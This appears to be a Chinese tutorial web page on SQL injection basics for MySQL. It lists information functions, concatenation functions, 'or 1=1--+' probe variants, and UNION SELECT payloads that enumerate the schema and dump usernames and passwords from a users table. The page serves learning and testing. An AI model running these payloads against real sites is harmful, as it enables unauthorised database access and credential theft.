2025年3月23日 星期日 甲辰(龙)年 月廿二 设为首页 加入收藏
rss
您当前的位置:首页 > 计算机 > 安全防护

sqli注入前置知识

时间:03-12来源:作者:点击数:35

常用函数

  • 1. version()——MySQL 版本
  • 2. user()——数据库用户名
  • 3. database()——数据库名
  • 4. @@datadir——数据库路径
  • 5. @@version_compile_os——操作系统版本

字符串连接函数

  • 1. concat(str1,str2,...)——没有分隔符地连接字符串
  • 2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串
  • 3. group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据
  • 一般用于尝试的语句

Ps:–+可以用#替换,url 提交过程中Url 编码后的#为%23

  • or 1=1--+
  • 'or 1=1--+
  • "or 1=1--+
  • )or 1=1--+
  • ')or 1=1--+
  • ") or 1=1--+
  • "))or 1=1--+

常用命令

  • order by -- + 判断字段数目
  • union select -- + 联合查询收集信息
  • id=1and 1=2 UNION SELECT 1,2,database() -- + 查询当前数据库
  • id=1and 1=2 UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata -- +查询所有数据库
  • id=1and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- +查询表名
  • id=1and 1=2 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name=’users’ -- + 查询列名
  • id=1and 1=2 UNION SELECT 1,2,group_concat(id,username,password) from users -- + 查询字段值
方便获取更多学习、工作、生活信息请关注本站微信公众号城东书院 微信服务号城东书院 微信订阅号
推荐内容
相关内容
栏目更新
栏目热门